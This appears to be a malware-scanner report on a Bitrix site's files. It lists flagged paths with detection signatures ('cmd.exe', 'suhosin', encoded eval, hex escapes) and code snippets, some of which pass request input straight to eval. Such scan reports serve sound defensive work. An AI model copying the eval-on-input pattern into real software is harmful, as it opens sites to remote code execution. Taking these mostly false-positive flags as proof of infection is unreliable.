Size: 51.72 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 396 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

Sign 471b95ee Line: 571 Dangerous

Malware Signature (hash: 471b95ee)

SUHOSIN

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/en/admin/update_system.php

Size: 20.34 kB Created: 2022-12-02 17:29:57 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other wordsno updates may be available). If any of the module updates are availableplease install them first."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUBS_SOURCES"] = "Download source code"; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUBS_SUPPORT"] = "System Area"; $MESS["SUP_SUBT_AGREE"] = "I accept the license agreement"; $MESS["SUP_SUBT_ERROR_LICENCE"] = "Error accepting the license agreement"; $MESS["SU...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/lang/ru/admin/site_checker.php

Size: 82.02 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 94 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/dump_list.php

Size: 15.66 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);
            
PartDownload();
        }
        
CHttpRequest.Send(url);
    }

    function 
PartDownload()
    {
        if (!
links || links.length == 0)
            return;

        var 
link links.pop();
        var 
iframe document.createElement('iframe');
        
iframe.style.display "none";
        
iframe.src link;
        
document.body.appendChild(iframe);

        
window.setTimeout(PartDownload10000);
    }

    function 
EndDump()
    {
    }
</
script>
<
div id="dump_result_div"></div>
<? 
$lAdmin->DisplayList(); echo BeginNote(); echo GetMessage("MAIN_DUMP_HEAD...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/site_checker.php

Size: 31.12 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);

                var 
oTable BX('fix_table');
                if (
oRow BX('in_progress'))
                {
                    
oCell oRow.cells[1];
                }
                else
                {
                    
oRow oTable.insertRow(-1);
                    
oCell oRow.insertCell(-1);
                    
oCell.style.width '40%';
                    
oCell.innerHTML strCurrentTestName;
                    
oCell oRow.insertCell(-1);
                }

                if (
strResult == '')
                {
                    
oRow.setAttribute('id''in_progress');
                    
oCell.innerHTML '<div class="sc_progress" style="width:' test_percent '%">' test_percent ...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/group_edit.php

Size: 23.08 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.form1.USER_ID_FROM_" id);
                var 
ed1 = eval("document.form1.USER_ID_TO_" id);
                
ed.disabled = !obj.checked;
                
ed1.disabled = !obj.checked;
            }
            </
script>
            <? 
$ind = -1$dbUsers CUser::GetList("id""asc", array("ACTIVE" => "Y")); while ($arUsers $dbUsers->Fetch()) { $ind++; ?>
                <tr>
                    <td>
                        <input type="hidden" name="USER_ID_<?=$ind?>" value="<?=$arUsers["ID"?>">
                        <input type="checkbox" name="USER_ID_ACT_<?=$ind?>" id="USER_ID_ACT_ID_<?=$ind?>"...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/checklist_detail.php

Size: 15.86 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("(" +data+")");
                var 
show_result false;
                var 
buttons BX.findChildren(BX('checklist-popup-tes-status'), {className:'checklist-popup-tes-status'});
                if (
json_data.STATUS || stoptest == true)
                {
                    if (
json_data.STATUS)
                    {
                        
BX("show_detail_link").style.display "none";
                        
BX("detail_system_comment_<?=$jsTestID;?>").innerHTML "";
                        
currentStatus json_data.STATUS;
                        
RefreshCheckList(json_data);
                        for(var 
i=0i<buttons.lengthi++)
                        
BX.removeCl...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/main_controller.php

Size: 8.72 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($oRequest->arParameters['join_command']); $oResponse->status "200 OK"; } else { $oResponse->status "472 Bad Request"$oResponse->text GetMessage("MAIN_ADM_CONTROLLER_ERR8"); } } elseif(!$oRequest->Check()) { $oResponse->status "403 Access Denied"$oResponse->text "Access Denied"; } else { switch($oRequest->operation) { case "ping"$oResponse->status "200 OK"; break; case "register"$ticket_id COption::GetOptionString("main""controller_ticket"""); list($ticket_created, ...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/dump.php

Size: 46.71 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(result))
            
counter_sec regs[1];
    }
}

function 
IncCounter()
{
    
window.setTimeout(IncCounter1000);
    if (!
counter_started)
        return;

    
counter_sec ++;
    var 
ob;
    if (
ob BX('counter_field'))
    {
        var 
min Math.floor(counter_sec 60);
        var 
sec counter_sec 60;
        if (
min 10)
            
min '0' min;
        if (
sec 10)
            
sec '0' sec;
        
ob.innerHTML min ':' sec;
    }
}
window.setTimeout(IncCounter1000);

function 
GetLicenseInfo()
{
    
CHttpRequest.Action = function(result)
    {
        
BX('...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/php_command_line.php

Size: 11.03 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($query); ob_end_flush(); printf("<hr>".GetMessage("php_cmd_exec_time")." %0.6f"microtime(1) - $stime); } require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_js.php"); die(); } $APPLICATION->SetTitle(GetMessage("php_cmd_title")); CJSCore::Init(array('ls')); if( $_SERVER['REQUEST_METHOD'] == 'POST' && $_POST["ajax"] === "y" && (isset($_POST["add"]) || $remove) ) { CUtil::JSPostUnescape(); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_a...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/checklist.php

Size: 44.57 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var DetailWindow = false;
        var arMainStat ={
            "REQUIRE":<?=$arStat["REQUIRE"];?>,
            "REQUIRE_CHECK":<?=$arStat["REQUIRE_CHECK"];?>,
            "FAILED":<?=$arStat["FAILED"];?>,
            "SUCCESS":<?=$arStat["CHECK"];?>,
            "SUCCESS_R":<?=$arStat["CHECK_R"];?>,
            "TOTAL":<?=$arStat["TOTAL"];?>
        };
        var arRequireCount=<?=$arStat["REQUIRE"];?>;
        var arRequireCheckCount=<?=$arStat["REQUIRE_CHECK"];?>;
        var arFailedCount = <?=$arStat["FAILED"];?>;
        var CanClose = "<?=$arCanClose;...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/checklist_report.php

Size: 18.83 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Line: 305 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var Dialog = false;
        var current = 0;
        var next = 0;
        var prev = 0;
        var last_id = false;
        function InitState()
        {
            var el = false;
            for (var i=0;i<arStates["SECTIONS"].length;i++)
            {
                el = arStates["SECTIONS"][i];
                if (el.CHECKED == "Y")
                    BX.addClass(BX(el.ID+"_name"),"checklist-testlist-green");
                BX(el.ID+"_stat").innerHTML = "(<span class=\"checklist-testlist-passed-test\">"+el.CHECK+"</span>/"+el.TOTAL+")";
            }
            for (i=0;i<arStates["POINTS...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/admin/userfield_edit.php

Size: 18.95 kB Created: 2022-12-02 17:29:58 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(i);
            if (
&& r[1] > 0)
            {
                
addNewRow('list_table');
            }
        }

    });

});
//-->
</script>
<? 
$formAction $APPLICATION->GetCurPage(); $formAction $adminSidePanelHelper->setDefaultQueryParams($formAction); ?>
<form method="POST" action="<?=$formAction?>" ENCTYPE="multipart/form-data" name="post_form">
<? $tabControl->Begin(); ?>
<? $tabControl
->BeginNextTab(); ?>
    <?if($ID):?>
    <tr>
        <td width="40%">ID:</td>
        <td width="60%"><?=$ID?></td>
    </tr>
    <?endif?>
    <tr class="adm-detail-r...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/vendor/phpmailer/phpmailer/src/PHPMailer.php

Size: 171.45 kB Created: 2022-12-02 17:29:59 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Sign a408f408 Line: 1806 Dangerous

Malware Signature (hash: a408f408)

cmd.exe

/home/web/web/vsavto.com/public_html/bitrix/modules/main/vendor/phpmailer/phpmailer/language/phpmailer.lang-lt.php

Size: 1.59 kB Created: 2022-12-02 17:29:59 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Function str_rot13 eval_str_rot13 Line: 12 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

riny

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/template/condition.php

Size: 25.52 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(" return (" trim($conditionEval) . "); "); return $result; } return true; } } class CondCtrl { const LOGIC_EQUAL 'equal'; const LOGIC_NOT 'not'; const LOGIC_START 'start'; const LOGIC_END 'end'; const LOGIC_HAS 'has'; const LOGIC_LT 'lt'; const LOGIC_LTE 'lte'; const LOGIC_MT 'mt'; const LOGIC_MTE 'mte'; public static function getTypePrefix($name$text) { return ['type' => 'prefix''name' => $name'text' => $text]; } public static function getTypeLogic($name$values ...

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/zazumedia_ru.php

Size: 16.86 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsgateway24com.php

Size: 10.35 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 24 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsgateway24_com.php

Size: 7.61 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 56 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/ibatele_com.php

Size: 10.19 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/a2p_sms_https_beeline_ru.php

Size: 13.85 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsbliss_ru.php

Size: 14.85 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 29 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/p1sms_ru.php

Size: 12.67 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 54 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/streamtelecom.php

Size: 13.49 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 19 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/promosms_ru.php

Size: 11.03 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/osonsms_com.php

Size: 10.75 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 24 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/terasms_ru.php

Size: 15.04 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 33 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_ru.php

Size: 35.62 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/targetsms_ru.php

Size: 15.43 kB Created: 2024-03-13 06:23:26 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms48.php

Size: 12.44 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 46 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_prosto_ru.php

Size: 10.87 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/prostor_sms_ru.php

Size: 17.33 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/i_dgtl_ru.php

Size: 13.69 kB Created: 2024-03-13 06:23:28 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 22 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_sending_ru.php

Size: 14.96 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/tele2.php

Size: 10.04 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 76 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_su.php

Size: 10.80 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sendpulse_com.php

Size: 11.58 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 29 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms2_ru.php

Size: 9.69 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/intistele_com.php

Size: 12.85 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 43 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/mobizon_ua.php

Size: 10.31 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 34 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsint_ru.php

Size: 15.28 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 45 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_fly_ua.php

Size: 10.23 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 21 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/semysms_net.php

Size: 9.29 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/talk_me_ru.php

Size: 16.13 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 17 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/devinotele_com.php

Size: 11.40 kB Created: 2024-03-13 06:23:27 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 77 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/infosmska_ru.php

Size: 10.51 kB Created: 2024-03-13 06:23:29 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 54 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/pushsms_ru.php

Size: 9.33 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 32 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/b2b_sms_ru.php

Size: 15.54 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/redsms_ru.php

Size: 11.66 kB Created: 2024-03-13 06:23:25 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 25 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/alphasms_ua.php

Size: 19.08 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms4b_ru.php

Size: 11.97 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/bytehand_com.php

Size: 18.11 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsimple_ru.php

Size: 12.75 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/tele2_ru.php

Size: 6.86 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 57 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/axtele_com.php

Size: 10.25 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 52 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsy_es.php

Size: 17.45 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/imobis_ru.php

Size: 11.89 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 24 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_uslugi_ru.php

Size: 18.48 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 24 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/tele2_target.php

Size: 12.80 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 33 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsgorod_ru.php

Size: 12.69 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 34 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/rocketsms_by.php

Size: 10.28 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 26 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/twilio_com.php

Size: 8.35 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 41 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/esputnik_ru.php

Size: 10.94 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 65 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_assistent_by.php

Size: 10.06 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 15 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/mainsms.php

Size: 16.48 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 40 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smspro_nikita_kg.php

Size: 15.27 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms.php

Size: 40.55 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 20 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/aramba_ru.php

Size: 9.93 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 23 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/kolibrisms_ru.php

Size: 8.98 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 16 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/kolibrisms.php

Size: 13.15 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 104 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/kazinfoteh_kz.php

Size: 13.18 kB Created: 2024-03-13 06:23:24 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 27 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/easy_sms_ru.php

Size: 15.80 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 18 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/smsaero_ru.php

Size: 9.96 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 14 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/bytehand.php

Size: 21.55 kB Created: 2024-03-13 06:23:19 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 19 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/sms_fly_com.php

Size: 17.50 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

Exploit hex_char Line: 56 Dangerous

Hex char is usually used for the obfuscation of malicious code

\x5f

/home/web/web/vsavto.com/public_html/bitrix/modules/bxmaker.smsnotice/lib/service/atompark_com.php

Size: 10.50 kB Created: 2024-03-13 06:23:20 Modified: 2025-02-03 05:36:39 Dangers: 1
DescriptionMatch

